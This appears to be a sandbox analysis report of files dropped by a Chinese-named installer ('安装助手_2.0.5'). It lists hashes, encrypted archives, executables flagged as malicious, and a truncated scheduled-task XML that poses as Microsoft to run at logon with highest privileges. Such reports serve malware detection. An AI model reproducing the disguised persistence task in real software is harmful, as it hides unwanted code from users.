                                                          SHA1:C8D2532139FE2A265D4ED10E30A807176F8F3BAA
                                                          SHA-256:B80ADB9791998685A921FFFEFBE66B059F56C0CF0055DBBCCB4515B60F6337C1
                                                          SHA-512:14D24D465B4608DE0FE31D86C45D20F4A97C492D13F12FA62EF7290AC1CB2FE9A65FA09702497E76FBDF8D9894487B7D9E182E514B7EE3785F824DC944709492
                                                          Malicious:false
                                                          Preview:7z..'.....:u........2........4.!.-.....N...H..M 18.....&..G.....VHJ..@..1.x.9....P.U....<...}.V.k.^....Q..VX4.!D.=..3F...;.P....n.....L..j.&.?.0^....E...i\A.5F...CzO..D..]&B..Z .L}...Z..m.P...OI.5J"{./...5v.u...:.1.....mA..V.?...PW.z*...b.4.d.g..`.+`?PE....o...\...M...Z;.N....0....1t.&(I....B...j.........9...T.O.u...m<....[..7..v4..W..#L^c..P.).+.G......f.)x.S...8.l. -.]...\k.4.<.n....Q0.D.I.:.(#PU.CLe...B.P...M~.N.4e...%.......Hp...(.o.......3.iF..".w.b..A-6...R......R...pc5L.....fgN.=_7U/.E..z.M....3R.5qq.)....p.?....X(.l..o.s.t.I..6U.T....K...d.......!..i.O.....U...z.w....m..7+....).&..S.M.......[Z.j....e.k.k.7.n...a..LR.>..-.85....x.y}.....v...g...r..C.....N.U3{(..'..\l.....{...5$.|..=^...l...R...(.f...=.;...m.=>.w....5.]..q.. *O.....`.{.|..TR#\z......(ETpTV..}.q..y`....53.P..,H'.../W..0..[..h..]...-...y..8InU.}..6......%T.sI..)...9.UYyZ...4{1n......5=..._7`4....h+..g.V...M...YR..&8...}...#(....g.-..?a7q9.%pu.'._...N...C.t...XNZ.L.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.996966859255975
                                                          Encrypted:true
                                                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                          Malicious:false
                                                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.996966859255979
                                                          Encrypted:true
                                                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                          MD5:4CB8B7E557C80FC7B014133AB834A042
                                                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                          Malicious:false
                                                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):31890
                                                          Entropy (8bit):7.99402458740637
                                                          Encrypted:true
                                                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                          MD5:8622FC7228777F64A47BD6C61478ADD9
                                                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                          Malicious:false
                                                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):31890
                                                          Entropy (8bit):7.99402458740637
                                                          Encrypted:true
                                                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                          Malicious:false
                                                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):74960
                                                          Entropy (8bit):7.99759370165655
                                                          Encrypted:true
                                                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                          MD5:950338D50B95A25F494EE74E97B7B7A9
                                                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                          Malicious:false
                                                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):74960
                                                          Entropy (8bit):7.997593701656546
                                                          Encrypted:true
                                                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                          Malicious:false
                                                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):29730
                                                          Entropy (8bit):7.994290657653607
                                                          Encrypted:true
                                                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                          Malicious:false
                                                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):29730
                                                          Entropy (8bit):7.994290657653608
                                                          Encrypted:true
                                                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                          Malicious:false
                                                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):249984
                                                          Entropy (8bit):7.999231321310215
                                                          Encrypted:true
                                                          SSDEEP:3072:bq197wBcGJFKwAA/THosHch/5mC8rR2rUPXPMzBQZ3N0AVebaKsjBL2Itvz38sho:e2ckFr8h/5Ct2rUM1QVdw+KeySr3Fet
                                                          MD5:F81297786EB640B840BB7B630C00C588
                                                          SHA1:6B29628368E57D349B617755224ABB6A17FA61EF
                                                          SHA-256:ED33C18470A3C637FF0EA85152913C814CB959AC3F6C95AB505E7BD70C6D218F
                                                          SHA-512:45990D001BDB62654086B6D9D59B6D1545104DCC8C4D6D9D5F6B2A88F986C097A637F726DD56A23AA9538E9BC03ABE4AD9B159F61BF61D21B4CB21C4FDD7FB26
                                                          Malicious:false
                                                          Preview:7z..'...... .......@..........inxr.f\....../_...]...T...N@w[..1.A.f..e+.G.F...d]r.'sO:..B.....My.a.M.....gL.Q..}fI."H......cj........nu...4.y.J`....\,+sxS.e...o...o.n}..K|j},.Oh....l6[.-..a......C..f}.u....P..Q6]...XN..<2p....&r..qV..'...BV.t............l..1...../qq.v.V.^.6....a.)e.R..fr$.:G?.3....)..M..n.B.c..o.uC..y..........Z...u..9V.JE.>....x.f0@.E...>...r.r.W.............D..z.... ..D...*:.n.J.%..?.....E.a..j.............-...1....X..aRC>.2.,..0k...D.3+?..'.J.r...Q..#E.nH..;.>../JL.9&J<.$q......7.B.u...........yB......<....?...`._I.6.g.G.o.....H5.y.........w..qv..#(..v..?U..n..=..|...s..??\...F...Q.\k..v.m K....A..:....kY$......0g7#.5.|.W...M..b.d........j..........$..O....!.|N[=.P};.j..c....tJ&......p..cC.T...ai.....sJ...../..f .+.HD5.P(.nI..P[.T.*.....y..'../9..]_...`...SYc.IlK.7.f..j...J..pWF...z.<...w..!:.;f.U.~.3.J.@C.:.......ZB*.l.....%.....t"..4.".\.jA...sZ=.W.(<...aH.,E.k..:.......:.H.F4.?.E..O.oi..y...0.e.G.B....Ov.l...........
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):63640
                                                          Entropy (8bit):6.482810107683822
                                                          Encrypted:false
                                                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):3.3482223822620667
                                                          Encrypted:false
                                                          SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                                                          MD5:1E1D0466AB0FE8F2802587D337A10567
                                                          SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                                                          SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                                                          SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                                                          Malicious:false
                                                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5649408
                                                          Entropy (8bit):6.392614480390128
                                                          Encrypted:false
                                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1628158735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nllluldhz/lL:NllU
                                                          MD5:03744CE5681CB7F5E53A02F19FA22067
                                                          SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                          SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                          SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                          Malicious:false
                                                          Preview:@...e.................................L..............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
